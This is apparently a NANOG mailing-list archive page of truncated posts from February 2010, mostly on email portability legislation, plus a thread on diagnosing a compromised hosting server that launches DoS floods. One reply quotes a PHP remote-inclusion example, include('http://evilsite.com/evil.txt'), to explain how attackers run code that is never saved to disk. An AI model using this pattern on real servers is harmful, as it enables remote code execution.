Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Johnny Eriksson
Robert Bonomi wrote: Quick! Somebody propose a snail-mail portability bill. When a renter changes to a different landlord, his snail-mail address will be optionally his to take along, just like what is proposed for ISP clients. No, a complete street address portability system. Assuming

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Gadi Evron
On 2/22/10 7:28 PM, Joe Abley wrote: On 2010-02-22, at 10:09, Gadi Evron wrote: The email portability bill has just been approved by the Knesset's committee for legislation, sending it on its way for the full legislation process of the Israeli parliament. While many users own a free email

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread D'Arcy J.M. Cain
On Tue, 23 Feb 2010 01:25:42 -0500 Steven Bellovin s...@cs.columbia.edu wrote: Figuring out how such a solution would work with email is left as an exercise for the reader. OK, let me give it a shot. How about if we allow anyone to buy a domain name of their own and then hire someone (e.g.

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Cian Brennan
On Tue, Feb 23, 2010 at 05:39:53AM -0500, D'Arcy J.M. Cain wrote: On Tue, 23 Feb 2010 01:25:42 -0500 Steven Bellovin s...@cs.columbia.edu wrote: Figuring out how such a solution would work with email is left as an exercise for the reader. OK, let me give it a shot. How about if we

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Leigh Porter
On 23/02/10 09:40, Johnny Eriksson wrote: Robert Bonomi wrote: Quick! Somebody propose a snail-mail portability bill. When a renter changes to a different landlord, his snail-mail address will be optionally his to take along, just like what is proposed for ISP clients. No, a

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Mans Nilsson
Just wait till customers start wanting to take their IP address with them when they move... When that happens, I hope there will be a new generation of suckers to fix it. There is PI space, you know ;) -- Måns Nilsson primary/secondary/besserwisser/machina MN-1334-RIPE

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Eric Brunner-Williams
On 2/23/10 1:25 AM, Steven Bellovin wrote: ... And who runs this database? Local number portability requires a new database, one that didn't exist before, It's run by a neutral party and maps any phone number to a carrier and endpoint identifier. (In the US, that database is currently run

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread D'Arcy J.M. Cain
[* Is trimming included text a lost art nowadays? *] On Tue, 23 Feb 2010 10:43:23+ Cian Brennan cian.bren...@redbrick.dcu.ie wrote: Maybe politicians should just keep their nose out of things that they can't understand. Email addresses aren't phone numbers. As has been pointed out

ISP in Johannesburg in Southdafrika

2010-02-23 Thread Xaver Aerni
Hello, We are looking for this year a Provider in Johannesburg for a temporay Internetconnection for 1 Mounth during the WM 2010. Does somebody know a Provider which has stabile line there. With speed 2 Mb or more. (guarantie) Greetings Xaver

Networks during disasters: coordinating locally

2010-02-23 Thread Sean Donelan
http://www.computerworld.com/s/article/9160298/Commercial_networks_in_Haiti_cause_problems_for_local_ISPs IDG News Service - While the communications networks that aid groups set up quickly following the earthquake in Haiti were surely critical to rescue efforts, the new networks have had

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Jeff Kell
On 2/23/2010 1:25 AM, Steven Bellovin wrote: Figuring out how such a solution would work with email is left as an exercise for the reader. Well, clearly, the planet just needs to join Active Directory, and the user convert to Outlook, and use the Global Address List, and... [Sorry, I

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Larry Sheldon
On 2/22/2010 11:20 PM, Dave CROCKER wrote: On 2/22/2010 8:42 PM, Larry Sheldon wrote: When Somebody calls one of my portable telephone numbers, they don't get a message telling them they have to call some other number. The get call progress tones. You are confusing what is presented

NANOG48 HD streams now active

2010-02-23 Thread Anton Kapela
Web browser embedded flash player: http://nanog.iristransport.net/nanog48/ VLC direct link: http://204.29.15.165:10001 Enjoy, -Tk

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread gordon b slater
On Tue, 2010-02-23 at 10:53 +, Leigh Porter wrote: Just wait till customers start wanting to take their IP address with them when they move... Oh wow, I think I've still got a log (somewhere) of all the dialup IPs I was assigned during the early 90s. Since I might be able to claim them

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Larry Sheldon
On 2/23/2010 4:39 AM, D'Arcy J.M. Cain wrote: Maybe politicians should just keep their nose out of things that they can't understand. Email addresses aren't phone numbers. It occurs to me that maybe there is a reason why political conservatives get so excited about minor, trivial erosions of

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread gordon b slater
On Tue, 2010-02-23 at 09:34 -0500, Jeff Kell wrote: Well, clearly, the planet just needs to join Active Directory, and the user convert to Outlook, and use the Global Address List, and... Ahem! If they (M$) were to go back to the LDAP specs, they could save a lot of time. They could even

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Curtis Maurand
On 2/22/2010 12:02 PM, Joel Esler wrote: I have an idea. Everyone just get a gmail (or otherwise neutral account) like me.com or gmail.com or yahoo.com and be done with it. J Sure and give all that information to data mining companies with no interest in privacy. No thank you. I

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Larry Sheldon
On 2/23/2010 4:43 AM, Cian Brennan wrote: As has been pointed out several times, they can easily be pretty close. Simply force them to send using the outgoing server of their new ISP, but allow them to still access their mailbox (which is really the only important bit the ISP hosts) over

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread N. Yaakov Ziskind
Larry Sheldon wrote (on Tue, Feb 23, 2010 at 10:28:03AM -0600): On 2/23/2010 4:39 AM, D'Arcy J.M. Cain wrote: Maybe politicians should just keep their nose out of things that they can't understand. Email addresses aren't phone numbers. It occurs to me that maybe there is a reason why

Re: DNS server software

2010-02-23 Thread Curtis Maurand
DNSSEC with powerdns is under development. Its coming soon to a server near you. --C On 2/22/2010 3:16 PM, Grzegorz Janoszka wrote: On 22-2-2010 15:39, Phil Regnauld wrote: PowerDNS also has an open source solution (www.powerdns.com). PowerDNS is easily modified with custom

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Scott Brim
N. Yaakov Ziskind allegedly wrote on 02/23/2010 11:34 EST: Larry Sheldon wrote (on Tue, Feb 23, 2010 at 10:28:03AM -0600): On 2/23/2010 4:39 AM, D'Arcy J.M. Cain wrote: Maybe politicians should just keep their nose out of things that they can't understand. Email addresses aren't phone

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Owen DeLong
On Feb 23, 2010, at 8:34 AM, N. Yaakov Ziskind wrote: Larry Sheldon wrote (on Tue, Feb 23, 2010 at 10:28:03AM -0600): On 2/23/2010 4:39 AM, D'Arcy J.M. Cain wrote: Maybe politicians should just keep their nose out of things that they can't understand. Email addresses aren't phone numbers.

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Shane Ronan
When in Tokyo, always have a MAP showing where you want to go. On Feb 23, 2010, at 11:34 AM, N. Yaakov Ziskind wrote: Larry Sheldon wrote (on Tue, Feb 23, 2010 at 10:28:03AM -0600): On 2/23/2010 4:39 AM, D'Arcy J.M. Cain wrote: Maybe politicians should just keep their nose out of things that

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Cian Brennan
On Tue, Feb 23, 2010 at 10:32:45AM -0600, Larry Sheldon wrote: On 2/23/2010 4:43 AM, Cian Brennan wrote: As has been pointed out several times, they can easily be pretty close. Simply force them to send using the outgoing server of their new ISP, but allow them to still access their

Kill this thread: Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread John Sage
Larry Sheldon wrote: On 2/23/2010 4:43 AM, Cian Brennan wrote: As has been pointed out several times, they can easily be pretty close. Simply force them to send using the outgoing server of their new ISP, but allow them to still access their mailbox (which is really the only important bit the

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Dave CROCKER
On 2/23/2010 8:44 AM, Scott Brim wrote: Simple: you separate 'mail' addresses from 'fire' addresses. Mail addresses are identifiers. Fire addresses are locators. wrong approach. simply get fire engines to have heat sensors and set their gps accordingly. d/ -- Dave Crocker

Re: NANOG48 HD streams now active

2010-02-23 Thread Larry Sheldon
On 2/23/2010 9:26 AM, Anton Kapela wrote: Web browser embedded flash player: http://nanog.iristransport.net/nanog48/ VLC direct link: http://204.29.15.165:10001 Enjoy, -Tk Heh. This message may be a scam and Thunderbird thinks this message is a scam. The links in the

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Rob Pickering
--On 23 February 2010 09:06 -0600 Larry Sheldon larryshel...@cox.net wrote: No kidding--something like making airlines do something railroads can do. I guess that depends whether you are talking about issuing flexible tickets or cruising at zero feet. -- Rob.

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Michael Dillon
If you want an example of just what would result, take a trip to Tokyo, where house numbers were assigned in the order that building permits were issued, and you need *extremely* detailed directions. The Soviet Union was not quite as chaotic as that, but they also didn't keep an organized

Re: Kill this thread: Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Larry Sheldon
On 2/23/2010 10:54 AM, John Sage wrote: Unquote I'd want to trade my email address for one that doesn't trigger empty responses. Or get me banned. But he's right, we should take the discussion of operational issues somewhere else. -- Government big enough to supply everything you need is big

Re: NANOG48 HD streams now active

2010-02-23 Thread Peter Hicks
Anton Kapela wrote: Web browser embedded flash player: http://nanog.iristransport.net/nanog48/ 7pm appears to be a bad time to tune in if you're in the UK... Poggs

Re: NANOG48 HD streams now active

2010-02-23 Thread Alan Clegg
Peter Hicks wrote: Anton Kapela wrote: Web browser embedded flash player: http://nanog.iristransport.net/nanog48/ 7pm appears to be a bad time to tune in if you're in the UK... The audio overlay of the people talking about the cake is quite humorous, I must say. AlanC signature.asc

Security Guideance

2010-02-23 Thread Paul Stewart
Hi folks... We have a strange series of events going on in the past while Brief history here, looking for input from the community - especially some of the security folks on here. We provide web hosting services - one of our hosting boxes was found a while back with root kits installed,

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Joel Jaeggli
Johnny Eriksson wrote: Robert Bonomi wrote: Quick! Somebody propose a snail-mail portability bill. When a renter changes to a different landlord, his snail-mail address will be optionally his to take along, just like what is proposed for ISP clients. No, a complete street address

Re: Security Guideance

2010-02-23 Thread Ronald Cotoni
Quick suggestion BUT you may want to have Parallels look into it if you can't seem to find it since you pay for the support anyways. You may also want to check to see if it is a cron job that is doing it (if the machine was root kitted, you may have accidentally copied a cron job over. Another

RE: Security Guideance

2010-02-23 Thread Matt Sprague
The user could also be running the command inline somehow or deleting the file when they log off. Check who was logged onto the server at the time of the attack to narrow down your search. I like the split the users idea, though it could be several iterations to narrow down the culprit.

Re: RE: Security Guideance

2010-02-23 Thread Paul Bosworth
Place an ids in front of the server and write a rule for the traffic signature. Paul B. Sent with Android On Feb 23, 2010 3:25 PM, Matt Sprague mspra...@readytechs.com wrote: The user could also be running the command inline somehow or deleting the file when they log off. Check who was logged

Re: Security Guideance

2010-02-23 Thread Michael Holstein
The user could also be running the command inline somehow or deleting the file when they log off. wiretapping your SSHd is one way to find out what people are up to http://forums.devshed.com/bsd-help-31/logging-ssh-shell-sessions-30398.html Also .. if you have the resources, a passive tap

Re: Security Guideance

2010-02-23 Thread Dan White
On 23/02/10 15:19 -0500, Ronald Cotoni wrote: Quick suggestion BUT you may want to have Parallels look into it if you can't seem to find it since you pay for the support anyways. You may also want to check to see if it is a cron job that is doing it (if the machine was root kitted, you may have

Re: Security Guideance

2010-02-23 Thread acv
These tools will relate IP flow to UID in Linux: # Get the sockets that are open netstat -an # lsof (as root) sockets to pid and owner uid. lsof If netstat doen't show it, it could be a raw socket... Or your root-kit's still there. Raw sockets will still show in lsof. Alex On Tue, Feb 23, 2010

Re: Security Guideance

2010-02-23 Thread LaDerrick H.
On Tue, Feb 23, 2010 at 02:46:54PM -0500, Paul Stewart wrote: Hi folks... We have a strange series of events going on in the past while Brief history here, looking for input from the community - especially some of the security folks on here. We provide web hosting services -

Re: Security Guideance

2010-02-23 Thread David Freedman
What tools/practices do others use to resolve this issue? use lsof, should be able to show you consumption of network socket resources by process (and hence user, hopefully) Dave.

Re: Security Guideance

2010-02-23 Thread Chris Adams
Once upon a time, Matt Sprague mspra...@readytechs.com said: The user could also be running the command inline somehow or deleting the file when they log off. Check who was logged onto the server at the time of the attack to narrow down your search. I like the split the users idea, though

Re: Email Portability Approved by Knesset Committee

2010-02-23 Thread Barry Shein
The suggestion to own your own domain name coupled with some consumer protection against practices which resist transferring domain names to a new provider solves this problem well enough. Maybe that's even what's slipping thru the cracks of these 10 second mechanical google translations? --

RE: Security Guideance

2010-02-23 Thread Joe Conlin
From personal experience you will likely not find much help from Parallels. We provide webhosting here on the Plesk 8.x and 9 platforms and in similar situations I have found good results using a combination of OSSEC (http://www.ossec.net/ BIG shout out to these guys, this project makes my life so

Re: Security Guideance

2010-02-23 Thread Nate Itkin
On Tue, Feb 23, 2010 at 02:46:54PM -0500, Paul Stewart wrote: The problem is that a user on this box appears to be launching high traffic DOS attacks from it towards other sites. It's possible the user inadvertently enabled the same exploit after you rebuilt the system. I suggest caution with

Re: Security Guideance

2010-02-23 Thread Valdis . Kletnieks
On Tue, 23 Feb 2010 11:27:21 -1000, Nate Itkin said: On Tue, Feb 23, 2010 at 02:46:54PM -0500, Paul Stewart wrote: The problem is that a user on this box appears to be launching high traffic DOS attacks from it towards other sites. It's possible the user inadvertently enabled the same

Re: Security Guideance

2010-02-23 Thread Nathan Ward
Using lsof, netstat, ls, ps, looking through proc with ls, cat, etc. is likely to not work if there's a rootkit on the box. The whole point of a rootkit is to hide processes and files from these tools. Get some statically linked versions of these bins on to the server, and hope they haven't

RE: Security Guideance

2010-02-23 Thread Joe
Just figured I might add a little direction to this. 1. If its a production system that impacts several users/customers your best bet would be to rebuild the system from scratch, not an image. Yes takes time, but investigating it will likely take longer. As you previously mentioned the

RE: Security Guideance

2010-02-23 Thread Express Web Systems
The problem is that a user on this box appears to be launching high traffic DOS attacks from it towards other sites. These are UDP based floods that move around from time to time - most of these attacks only last a few minutes. I've done tcpdumps within seconds of the attack starting

Re: NANOG48 HD streams now active

2010-02-23 Thread Glen Turner
7pm appears to be a bad time to tune in if you're in the UK... The streaming is very appreciated. A clock visible to the camera would save the hassle of translating local time to agenda time. -- Glen Turner http://www.gdt.id.au/~gdt/

Re: Security Guideance

2010-02-23 Thread Gadi Evron
On 2/23/10 9:46 PM, Paul Stewart wrote: Hi folks... We have a strange series of events going on in the past while Brief history here, looking for input from the community - especially some of the security folks on here. If you can't discover the malware using methods available to you, are

Re: NANOG48 HD streams now active

2010-02-23 Thread Scott Weeks
--- g...@gdt.id.au wrote: From: Glen Turner g...@gdt.id.au 7pm appears to be a bad time to tune in if you're in the UK... The streaming is very appreciated. A clock visible to the camera would save the hassle of translating local time to agenda time.

Re: Security Guideance

2010-02-23 Thread Joel Esler
Why does there need to be blame? Diagnose the problem, fix the problem, move on with life. Someone made a mistake, learn from it, move on. -- Joel Esler joel.es...@me.com http://www.joelesler.net On Tuesday, February 23, 2010, at 05:13PM, valdis.kletni...@vt.edu wrote: On Tue, 23 Feb 2010

RE: Security Guideance

2010-02-23 Thread Adam Stasiniewicz
I've seem similar. Another variant of this is PHP code that lets arbitrary data be inputted into require() or include() statements, for example: include('http://evilsite.com/evil.txt'). That way, the attacker can then load whatever code they want and it will never be saved to the file system. I

Re: log parsing tool?

2010-02-23 Thread Matthew Palmer
On Mon, Feb 22, 2010 at 04:15:22PM -0600, fedora fedora wrote: Anyone has good recommendations for an open-sourced log parsing and analyzing application? It will be used to work with syslog-ng and other general syslog and application logs. I have been looking at swatch and logwatch, but